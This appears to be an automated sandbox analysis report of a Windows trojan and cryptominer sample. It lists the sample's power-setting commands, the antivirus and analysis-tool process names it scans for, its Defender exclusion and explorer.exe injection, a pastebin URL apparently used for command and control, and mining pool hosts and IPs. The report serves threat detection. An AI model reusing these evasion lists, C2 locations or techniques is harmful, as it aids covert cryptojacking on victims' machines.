                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies power options to not sleep / hibernate
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCSHIELD.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cfp.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVENGINE.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aswupdsv.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avkwctl.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav32.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZLCLIENT.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashServ.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashwebsv.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xcommsvr.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsdfwd.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mbam.exe

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		11
                  Windows Service                  		11
                  Windows Service                  		1
                  Masquerading                  		OS Credential Dumping321
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Service Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		131
                  Virtualization/Sandbox Evasion                  		Security Account Manager131
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets13
                  System Information Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture3
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  File Deletion                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570395 Sample: nlGOh9K5X5.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 54 xmr-eu1.nanopool.org 2->54 56 pastebin.com 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Multi AV Scanner detection for submitted file 2->68 74 5 other signatures 2->74 8 mfpmikspvfzi.exe 1 2->8         started        12 nlGOh9K5X5.exe 1 2 2->12         started        signatures3 70 DNS related to crypt mining pools 54->70 72 Connects to a pastebin service (likely for C&C) 56->72 process4 file5 50 C:\Windows\Temp\amhsyemgqpki.sys, PE32+ 8->50 dropped 76 Multi AV Scanner detection for dropped file 8->76 78 Found strings related to Crypto-Mining 8->78 80 Injects code into the Windows Explorer (explorer.exe) 8->80 88 2 other signatures 8->88 14 explorer.exe 8->14         started        18 powershell.exe 23 8->18         started        20 cmd.exe 1 8->20         started        28 10 other processes 8->28 52 C:\ProgramData\...\mfpmikspvfzi.exe, PE32+ 12->52 dropped 82 Uses powercfg.exe to modify the power settings 12->82 84 Adds a directory exclusion to Windows Defender 12->84 86 Modifies power options to not sleep / hibernate 12->86 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 12 other processes 12->30 signatures6 process7 dnsIp8 58 51.15.193.130, 10343, 49732 OnlineSASFR France 14->58 60 51.89.23.91, 10343, 49730 OVHFR France 14->60 62 pastebin.com 172.67.19.24, 443, 49731 CLOUDFLARENETUS United States 14->62 90 System process connects to network (likely due to code injection or exploit) 14->90 92 Query firmware table information (likely to detect VMs) 14->92 94 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->94 96 Loading BitLocker PowerShell Module 18->96 32 conhost.exe 18->32         started        44 2 other processes 20->44 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 wusa.exe 24->38         started        40 conhost.exe 26->40         started        46 9 other processes 28->46 42 conhost.exe 30->42         started        48 11 other processes 30->48 signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  nlGOh9K5X5.exe74%ReversingLabsWin64.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe74%ReversingLabsWin64.Trojan.Generic
                  C:\Windows\Temp\amhsyemgqpki.sys5%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  xmr-eu1.nanopool.org
                  		51.15.58.224
                  		truefalse
                    		high
                    pastebin.com
                    		172.67.19.24
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://pastebin.com/raw/Cs3YCuXTfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://pastebin.com/raw/Cs3YCuXTFexplorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://xmrig.com/docs/algorithmsmfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            51.15.193.130
                            		unknownFrance
                            		12876OnlineSASFRtrue
                            172.67.19.24
                            		pastebin.comUnited States
                            		13335CLOUDFLARENETUSfalse
                            51.89.23.91
                            		unknownFrance
                            		16276OVHFRtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1570395
                            Start date and time:2024-12-06 22:45:06 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 27s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:63
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:nlGOh9K5X5.exe
                            renamed because original name is a hash value
                            Original Sample Name:aca4c0d0dc6f260200ea503a5ce8b370f482044253613142efcdebe5fd92a9f3.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.mine.winEXE@81/12@2/3
                            EGA Information:
                            • Successful, ratio: 33.3%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target mfpmikspvfzi.exe, PID 7108 because it is empty
                            • Execution Graph export aborted for target nlGOh9K5X5.exe, PID 6664 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: nlGOh9K5X5.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            16:45:59API Interceptor1x Sleep call for process: nlGOh9K5X5.exe modified
                            16:46:00API Interceptor38x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            51.15.193.130NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                  Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                    SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                      updater.exeGet hashmaliciousXmrigBrowse
                                        upw82ArDKW.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse
                                          1DI50gCNGQ.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                            BIHRaOeReG.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
                                              file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse
                                                172.67.19.24sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                • pastebin.com/raw/sA04Mwk2
                                                51.89.23.916xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                                  4o8Tgrb384.exeGet hashmaliciousXmrigBrowse
                                                    file.exeGet hashmaliciousXmrigBrowse
                                                      SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                        eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          pastebin.comcJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.19.24
                                                          vortex.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                          • 104.20.3.235
                                                          MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                          • 172.67.19.24
                                                          msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 104.20.3.235
                                                          Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.19.24
                                                          asegurar.vbsGet hashmaliciousUnknownBrowse
                                                          • 104.20.4.235
                                                          crypted_LummaC2.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.19.24
                                                          crypted_LummaC2 (3).exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.19.24
                                                          'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 104.20.4.235
                                                          segura.vbsGet hashmaliciousUnknownBrowse
                                                          • 104.20.3.235
                                                          xmr-eu1.nanopool.orgLfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                          • 51.15.58.224
                                                          rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                                          • 51.15.65.182
                                                          6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                                          • 51.89.23.91
                                                          4o8Tgrb384.exeGet hashmaliciousXmrigBrowse
                                                          • 51.15.65.182
                                                          rtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                                          • 51.89.23.91
                                                          NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                          • 54.37.137.114
                                                          ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                                          • 54.37.232.103
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 163.172.154.142
                                                          HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                                          • 162.19.224.121
                                                          12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                                          • 51.15.65.182

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          OnlineSASFRLfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                          • 51.15.58.224
                                                          l64.elfGet hashmaliciousXmrigBrowse
                                                          • 51.158.204.249
                                                          Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                          • 163.172.240.109
                                                          EHak.exeGet hashmaliciousUnknownBrowse
                                                          • 62.210.124.132
                                                          EHak.exeGet hashmaliciousUnknownBrowse
                                                          • 62.210.124.132
                                                          teste.i686.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                          • 51.158.21.23
                                                          teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                          • 51.158.232.110
                                                          rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                                          • 212.47.253.124
                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                                                          • 163.172.171.111
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 163.172.171.111
                                                          CLOUDFLARENETUSFw Your flight has been cancelled.emlGet hashmaliciousUnknownBrowse
                                                          • 104.17.247.203
                                                          https://login.officeteam.didgim.com/factpath/resources/patch/047620476204762098/?tpj=PlKRhyZP6wwT3cO_YX5-vBD5GuXYTvvU?SehS24G3uU3qw64njI8IZH7gQJoi5rbp7C2uDZbPGel89LOXSbLkxzcBkcMiAnricyOgDlVZzgK16brTMbOGyuYoLIN4U0HH714JGet hashmaliciousReCaptcha PhishBrowse
                                                          • 104.16.124.96
                                                          Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                          • 104.21.40.3
                                                          https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousUnknownBrowse
                                                          • 104.21.16.114
                                                          Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                          • 104.21.40.3
                                                          https://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                                                          • 172.67.211.61
                                                          https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.26.9.44
                                                          https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                                                          • 104.18.95.41
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.165.166
                                                          OVHFRjew.arm6.elfGet hashmaliciousUnknownBrowse
                                                          • 46.105.173.201
                                                          jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                          • 51.222.237.209
                                                          https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                                          • 91.134.10.168
                                                          https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                                          • 46.105.222.162
                                                          i686.elfGet hashmaliciousUnknownBrowse
                                                          • 8.18.152.72
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 87.98.205.41
                                                          2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                          • 51.89.217.80
                                                          main_x86.elfGet hashmaliciousMiraiBrowse
                                                          • 151.80.169.13
                                                          https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                          • 5.196.111.73
                                                          https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                                                          • 51.89.9.254

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Windows\Temp\amhsyemgqpki.sysLfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                            iKvzvknzW1.exeGet hashmaliciousXmrigBrowse
                                                              2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                                DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                  f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                    luQ2wBh8q6.exeGet hashmaliciousXmrigBrowse
                                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                                        nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                          File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                            rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\nlGOh9K5X5.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):7198720
                                                                              Entropy (8bit):6.50791529944184
                                                                              Encrypted:false
                                                                              SSDEEP:196608:RLtecVgZlN3f+OvbCJLfuufYst5BpS7M4F:R/V0v+Ov+R2ufpk73F
                                                                              MD5:6369AD2A31D25FA131268F312B0C9D03
                                                                              SHA1:3560BBB24D688B8356615077FF8509D3FB438E05
                                                                              SHA-256:ACA4C0D0DC6F260200EA503A5CE8B370F482044253613142EFCDEBE5FD92A9F3
                                                                              SHA-512:BCB3082810B809E7B2C733A6A5E4ACE79C30116854A546A3E92D76806059E3D097090B5D924E93BBACF51105E70E6385579BB01FA7D1C590B53F934F426656B6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....:g.........."..........Bm.....@..........@.............................Pn.......m...`.....................................................<....0m.......m..............@n.x...............................(.......8...............X............................text...f........................... ..`.rdata..<$.......&..................@..@.data.....l.......l.................@....pdata........m.......l.............@..@.00cfg........m.......l.............@..@.tls......... m.......l.............@....rsrc........0m.......l.............@..@.reloc..x....@n.......m.............@..B........................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                              Malicious:false
                                                                              Preview:@...e.................................&..............@..........

